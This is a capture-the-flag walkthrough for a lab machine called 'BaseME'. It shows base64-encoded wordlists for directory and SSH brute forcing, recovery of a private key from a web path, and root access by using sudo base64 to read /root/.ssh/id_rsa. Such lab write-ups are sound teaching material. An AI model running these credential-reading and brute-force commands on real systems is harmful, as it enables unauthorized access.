BaseME

Described as "CTF like"

Nmap results:

If we take a look at port 80 in a web browser we have a really long string that appears to be encoded in base64. As always view the source.

Lets decode the long string with base64 -d string.txt

Ok so base64 is our friend. So I think we need to encode the commented lines in the source to base64 and see which one gets us in via ssh with the username lucas.

We can do this quickly with a simple for loop as follows:

for i in $(cat pass.txt); do echo $i | base64 >> base64.txt; done

Once that's done we can use hydra to brute force ssh with our base64.txt file as the password list.

Or so I thought. I ran dirb, gobuster and dirbuster and came up with empty handed. "BASE64 has the answer to all your questions." hmm.

Lets take a wordlist and convert it to base64 to run in gobuster.

Another for loop will make quick work of this.

for i in $(cat /usr/share/seclists/Discovery/Web-Content/common.txt);do echo $i | base64 >> dict64.txt;done

ah ha! Both of these are files. And one which is long caught my interst first.

If we decode it with base64 -d /aWRfcnNhCg== you will find that its an id_rsa file.

passphrase for key? hmm. oh I bet it was one of the ones from our base64.txt files we made earlier.

Privilege Escalation

Head over to GTFO and look for base64.

So we can read roots /root/root.txt file and get the flag, however, we are not root. Lets see if we can get root level.

What we need to do is read /root/.ssh/id_rsa

sudo /usr/bin/base64 /root/.ssh/id_rsa > rootrsa

Then we need to decode that into an id_rsa file with the correct permissions for ssh

base64 -d rootrsa > id_rsa && chmod 600 id_rsa

We can now ssh to root as follows:

ssh -i id_rsa root@localhost

Bam!!

Reading root.txt flag as lucas is enough to submit the flag but as penetration tester the ultimate goal is to gain root.